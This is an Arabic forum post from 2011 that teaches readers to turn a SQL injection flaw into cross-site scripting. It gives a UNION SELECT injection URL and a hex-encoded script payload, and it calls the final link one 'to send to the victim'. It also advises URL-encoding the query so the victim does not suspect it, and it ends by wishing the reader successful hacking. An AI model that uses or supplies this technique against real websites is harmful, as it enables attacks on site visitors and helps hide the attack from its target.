عرض مشاركة واحدة
قديم 08-03-2011, 02:46 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
JetLi
 
الصورة الرمزية JetLi
 

 

 
إحصائية العضو






JetLi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
JetLi is on a distinguished road

.... العلاقة ما بين SQL injection & XSS


السلام عليكم ،
الجميع يعرف الحقن والثغرة الاخرىى ولكن هل يمكننا استغلال ثغرة الحقن لتوليد xss يمكن ذلك ولكن بعدة شروط ،

الشرط الاول :
- ظهور الاعمدة المصابة في الصفحة مثلا 1و2و3 ....
الشرط الثاني:
- دالة hex تكون غير محظورة لاننا سنتغلها لحقن كود الجافا،

نأتي للطريقة :
مثلا لديك رابط حقن في الموقع

كود:
http://www.site.com/index.php?id=-1+union+select+1--
نستبدل الرقم 1 الاخير بدالة hex
ونشفر الكود ***************('9');</script> بستخدام اي موقع تشفير او اضافة firefox المسماة hackbar

انا شفرتها لكم :
كود:
0x3c7363726970743e616c6572742839293b3c2f7363726970743e
يصبح رابط xss الذي سترسله للضحية بالشكل التالي

كود:
http://www.site.com/index.php?id=-1+union+select+hex(0x3c7363726970743e616c6572742839293b3c2f7363726970743e)--
طبعا يمكنك ان تعمل عملية url encode لتعليمات union +select الإخفائها حتى لا يشك الضحية ،
في الختام اختراق موفق ،
اذا عجبك الموضوع قيمني




hgughrm lh fdk SQL injection & XSS la;,v injection a;v a;vh sql sql injection xss

التوقيع

http://www.pollsb.com/photos/o/33924...tony_stark.jpg
التهكير يجعلك تنظر للحياة بعمق وترو

 


التعديل الأخير تم بواسطة bleu moon ; 08-05-2011 الساعة 07:46 PM.

   

رد مع اقتباس